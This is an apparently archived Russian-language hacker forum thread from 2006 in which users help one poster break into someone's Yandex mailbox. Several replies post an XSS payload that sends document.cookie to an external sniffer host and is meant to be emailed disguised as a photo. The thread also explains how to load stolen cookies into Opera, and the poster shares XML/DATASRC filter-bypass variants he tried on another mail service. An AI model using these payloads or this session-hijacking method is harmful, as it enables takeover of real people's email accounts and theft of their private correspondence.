Просмотр полной версии : Получил сессию с yandex и не знаю что с ней делат. Помогите.
m2infect
26.06.2006, 01:07
IP=XX.XX.XX.Xx SITE=mail.yandex.ru
REFERER=http://mail.yandex.ru/msg?mesid=9000000000023702702&folder=9000010000001704418
QUERY=
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TISA)
Господа, что-то я запутался во всем этом.
Как получить с помощью этого доступ в ящик?
:confused:
У тебя Query= пустая, в ней куки должны были прити. Так что это безполезная инфа.
m2infect
26.06.2006, 01:16
У тебя Query= пустая, в ней куки должны были прити. Так что это безполезная инфа.
Может и не правельно задам вопрос.
Но все же.
А что сделал не так. Присылаю письмо, его отткрываю, и снифф срабатыет. Сессию получил, а куки нет. Что я не так сделал.?
ты получил не сессию , а id письма и id папки
2) идентификация пользователя на яндексе идёт только через cookies
Может и не правельно задам вопрос.
Но все же.
А что сделал не так. Присылаю письмо, его отткрываю, и снифф срабатыет. Сессию получил, а куки нет. Что я не так сделал.?
А ты описание к сниферу (http://antichat.ru/sniff/) читал
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
Sol-leks
27.06.2006, 00:01
В итоге:
Ты видимо не тот скрипт указал, к своему способу..
Читай описание hidden'a.
Чтобы впихнуть свои куки юзай "Оперу": Интсрументы - Настройки - Дополнительно - Cookies - Управление Cookies, дальше будет видно какие циферки на что заменять...
нет, просто он указал как гиперссылку, а не как картинку и .т.д хидден всё верно указал, тока это наверное не пройдёт. хех это не старые-добрые времена, думаю вы меня поняли
Есть способ через народ, я ему уже обьяснил, в пм.
нет, просто он указал как гиперссылку, а не как картинку и .т.д хидден всё верно указал, тока это наверное не пройдёт. хех это не старые-добрые времена, думаю вы меня поняли
Со сниффером не пройдёт? Да ну.. Зашифровать снифф, и кинуть, если ты про это говоришь.
Это уже обсуждалось, вобщем в код картинки вставляеш скрипт
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
и отправляеш ее месте с письмом, ну и ждеш куков) если пользователь кот отправляеш полный лох и решит посмотреть твою фотку)
m2infect
01.07.2006, 02:25
др. почтовый севис - отличный от яндекса.
Ставлю в письме
<XML ID="xss"><I><B><IMG SRC="javas<!---->cript:alert('123')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
пишет - 123
ставлю
<XML ID="xss"><I><B><IMG SRC="javas<!---->cript:img = new Image(); img.src ="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;
)"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
и ставил просто ссылку, и кодировал в чар код, и редактировал все это, убираяя лишние пробелы. Результат - 0.
Вывод - нужно более экзоичным способом запостить туда скррипт со снифом, либо руки можно мне поломать.
Господа, отвечайте по существу.
С уважением!
Это уже обсуждалось, вобщем в код картинки вставляеш скрипт
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
и отправляеш ее месте с письмом, ну и ждеш куков) если пользователь кот отправляеш полный лох и решит посмотреть твою фотку)
Товариш а ты не думал что тама не лохи сидят и тама фильтры стоят?)
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot